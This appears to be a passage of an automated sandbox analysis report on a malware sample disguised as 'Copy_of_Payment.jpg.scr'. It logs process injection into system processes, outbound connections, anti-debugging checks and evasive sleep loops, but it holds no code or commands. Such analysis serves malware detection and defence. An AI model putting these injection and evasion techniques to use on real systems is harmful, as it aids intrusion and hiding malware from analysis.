Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\explorer.exe base: 29D6D74 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\explorer.exe base: 29D716C protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\explorer.exe base: 29D7000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\explorer.exe base: 29D7170 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1A0000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1D6D60 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1D6000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1D6D74 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1D716C protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1D7000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1D7170 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: unknown base: 3C0000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: unknown base: 3F6D60 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: unknown base: 3F6000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: unknown base: 3F6D74 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: unknown base: 3F716C protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: unknown base: 3F7000 protect: page execute and read and write
Source: C:\Windows\System32\dwm.exe	Memory protected: unknown base: 3F7170 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Thread created: C:\Windows\System32\dwm.exe EIP: 229C27
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Thread created: C:\Windows\System32\taskhost.exe EIP: 1A59C27
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Thread created: C:\Program Files\Windows Mail\WinMail.exe EIP: 4869C27
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Thread created: unknown EIP: 319C27
Source: C:\Windows\System32\dwm.exe	Thread created: C:\Windows\explorer.exe EIP: 29B9C27
Source: C:\Windows\System32\dwm.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 1B9C27
Source: C:\Windows\System32\dwm.exe	Thread created: unknown EIP: 3D9C27

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\dwm.exe base: 210000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\taskhost.exe base: 1A40000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Program Files\Windows Mail\WinMail.exe base: 4850000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: unknown base: 300000 value starts with: 4D5A
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\explorer.exe base: 29A0000 value starts with: 4D5A
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\System32\conhost.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dwm.exe	Memory written: unknown base: 3C0000 value starts with: 4D5A
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 30000 value starts with: 4D5A
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\HOSTNAME.EXE base: 30000 value starts with: 4D5A
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\tasklist.exe base: 30000 value starts with: 4D5A
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\ipconfig.exe base: 30000 value starts with: 4D5A
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\netsh.exe base: 140000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1236 base: 29A0000 value: 4D
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1236 base: 29D6D60 value: 00
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1236 base: 29D6D74 value: 00
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1236 base: 29D716C value: B8
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1236 base: 29D7170 value: 90

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Thread register set: target process: 3328

Sets debug register (to hijack the execution of another thread)

Show sources

Source: C:\Windows\explorer.exe

Thread register set: 3992 4BDF260

Writes to foreign memory regions

Show sources

Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\dwm.exe base: 210000
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\dwm.exe base: 246D60
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\dwm.exe base: 246D74
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\dwm.exe base: 24716C
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\dwm.exe base: 247170
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\taskhost.exe base: 1A40000
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\taskhost.exe base: 1A76D60
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\taskhost.exe base: 1A76D74
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\taskhost.exe base: 1A7716C
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Windows\System32\taskhost.exe base: 1A77170
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Program Files\Windows Mail\WinMail.exe base: 4850000
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Program Files\Windows Mail\WinMail.exe base: 4886D60
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Program Files\Windows Mail\WinMail.exe base: 4886D74
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Program Files\Windows Mail\WinMail.exe base: 488716C
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: C:\Program Files\Windows Mail\WinMail.exe base: 4887170
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: unknown base: 300000
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: unknown base: 336D60
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: unknown base: 336D74
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: unknown base: 33716C
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: unknown base: 337170
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\explorer.exe base: 29A0000
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\explorer.exe base: 29D6D60
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\explorer.exe base: 29D6D74
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\explorer.exe base: 29D716C
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\explorer.exe base: 29D7170
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\System32\conhost.exe base: 1A0000
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D6D60
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D6D74
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D716C
Source: C:\Windows\System32\dwm.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D7170
Source: C:\Windows\System32\dwm.exe	Memory written: unknown base: 3C0000
Source: C:\Windows\System32\dwm.exe	Memory written: unknown base: 3F6D60
Source: C:\Windows\System32\dwm.exe	Memory written: unknown base: 3F6D74
Source: C:\Windows\System32\dwm.exe	Memory written: unknown base: 3F716C
Source: C:\Windows\System32\dwm.exe	Memory written: unknown base: 3F7170
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 30000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 66D60
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 66D74
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 6716C
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 67170
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\HOSTNAME.EXE base: 30000
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\HOSTNAME.EXE base: 66D60
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\HOSTNAME.EXE base: 66D74
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\HOSTNAME.EXE base: 6716C
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\HOSTNAME.EXE base: 67170
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\tasklist.exe base: 30000
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\tasklist.exe base: 66D60
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\tasklist.exe base: 66D74
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\tasklist.exe base: 6716C
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\tasklist.exe base: 67170
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\ipconfig.exe base: 30000
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\ipconfig.exe base: 66D60
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\ipconfig.exe base: 66D74
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\ipconfig.exe base: 6716C
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\ipconfig.exe base: 67170
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\netsh.exe base: 140000
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\netsh.exe base: 176D60
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\netsh.exe base: 176D74
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\netsh.exe base: 17716C
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\netsh.exe base: 177170

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 167.114.109.203 80
Source: C:\Windows\explorer.exe	Network Connect: 216.58.219.196 80
Source: C:\Windows\explorer.exe	Network Connect: 74.125.195.94 80
Source: C:\Windows\explorer.exe	Network Connect: 74.125.195.94 187
Source: C:\Windows\explorer.exe	Network Connect: 23.51.117.163 80
Source: C:\Windows\explorer.exe	Network Connect: 23.42.27.27 80
Source: C:\Windows\explorer.exe	Network Connect: 216.58.217.142 80

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\dwm.exe

System information queried: KernelDebuggerInformation

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_0040B94B LdrLoadDll,LdrGetDllHandle,LdrLoadDll,EnterCriticalSection,EnterCriticalSection,LeaveCriticalSection,EnterCriticalSection,lstrcmpiW,LeaveCriticalSection,EnterCriticalSection,lstrcmpiW,lstrcmpiW,LeaveCriticalSection,

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_0042EE7B LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_00418D9E GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

Enables debug privileges

Show sources

Source: C:\Windows\System32\tasklist.exe

Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0043376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_00433826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0043376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_00433826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003F3826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003F376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0043376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_00433826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_00243826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0024376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_0488376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_04883826 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\explorer.exe	Code function: 8_2_029D3826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\explorer.exe	Code function: 8_2_029D376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A73826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A7376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_00063826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_0006376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001D3826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001D376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_00063826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_0006376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_00063826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_0006376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_00063826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_0006376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_00173826 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_0017376B PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,

Contains functionality to query local drives

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_0042E93F GetModuleHandleW,GetProcAddress,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,

Queries a list of all running processes

Show sources

Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe

Process information queried: ProcessInformation

Checks the free space of harddrives

Show sources

Source: C:\Program Files\Windows Mail\WinMail.exe

File Volume queried: C:\ FullSizeInformation

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Window / User API: threadDelayed 32579
Source: C:\Copy_of_Payment.jpg.scr	Window / User API: threadDelayed 578
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Window / User API: threadDelayed 33127
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 3251

Found evasive API chain (may stop execution after checking a module file name)

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Show sources

Source: C:\Copy_of_Payment.jpg.scr	API coverage: 9.8 %
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	API coverage: 5.9 %
Source: C:\Program Files\Windows Mail\WinMail.exe	API coverage: 7.0 %
Source: C:\Windows\System32\taskhost.exe	API coverage: 7.8 %
Source: C:\Windows\System32\cmd.exe	API coverage: 9.3 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\HOSTNAME.EXE	API coverage: 7.8 %
Source: C:\Windows\System32\tasklist.exe	API coverage: 8.1 %
Source: C:\Windows\System32\ipconfig.exe	API coverage: 8.2 %
Source: C:\Windows\System32\netsh.exe	API coverage: 8.2 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Copy_of_Payment.jpg.scr TID: 3320	Thread sleep count: 32579 > 100
Source: C:\Copy_of_Payment.jpg.scr TID: 3320	Thread sleep count: 578 > 100
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe TID: 3464	Thread sleep count: 33127 > 100
Source: C:\Windows\System32\dwm.exe TID: 3564	Thread sleep time: -60000ms >= -60000ms
Source: C:\Program Files\Windows Mail\WinMail.exe TID: 3620	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\explorer.exe TID: 1412	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\explorer.exe TID: 1412	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\tasklist.exe TID: 2672	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\ipconfig.exe TID: 1416	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\netsh.exe TID: 2504	Thread sleep time: -60000ms >= -60000ms

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Copy_of_Payment.jpg.scr	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
